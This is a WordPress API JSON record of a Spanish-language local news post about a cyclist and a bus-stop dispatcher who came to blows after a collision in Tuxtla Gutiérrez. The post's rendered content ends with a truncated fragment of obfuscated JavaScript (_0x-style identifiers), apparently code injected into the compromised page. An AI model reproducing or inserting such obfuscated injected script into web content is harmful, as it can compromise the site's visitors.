{"id":3937,"date":"2022-07-28T00:52:11","date_gmt":"2022-07-28T00:52:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3937"},"modified":"2022-07-28T00:52:12","modified_gmt":"2022-07-28T00:52:12","slug":"ciclista-y-checador-se-lian-a-golpes-en-parada-de-colectivos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3937","title":{"rendered":"Ciclista y checador se l\u00edan a golpes en parada de colectivos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"726\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658969408131-1024x726.jpg\" alt=\"\" class=\"wp-image-3938\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658969408131-1024x726.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658969408131-300x213.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658969408131-768x545.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658969408131.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 27 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles un ciclista y un checador de colectivos se liaron a golpes a la altura de la parada de Plaza cristal, luego de protagonizar un accidente.De acuerdo con testigos este hecho se deriv\u00f3 cuando el ciclista atropell\u00f3 al checador, cuando circulaba en la ciclo v\u00eda en el carril de Poniente a Oriente.En su defensa, el ciclista de nombre Ulises de 36 a\u00f1os de edad dijo que el checador se atraves\u00f3 de manera repentina y no pudo esquivarlo.El\u00edas de 32 a\u00f1os fue el lesionados quien se levant\u00f3 y encar\u00f3 al responsable y fue as\u00ed que pasaron a los golpes.El checador fue atendido por param\u00e9dicos de Protecci\u00f3n Civil Municipal.Polic\u00edas detuvieron a los implicados y fueron llevados ante el Ministerio p\u00fablico correspondiente para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 27 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles un ciclista y un checador de colectivos se liaron a golpes a la altura de la parada de Plaza cristal, luego de protagonizar un accidente.De acuerdo con testigos este hecho se deriv\u00f3 cuando el ciclista atropell\u00f3 al checador, cuando circulaba en la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3938,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3937","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3937","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3937"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3937\/revisions"}],"predecessor-version":[{"id":3939,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3937\/revisions\/3939"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3938"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3937"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3937"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3937"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}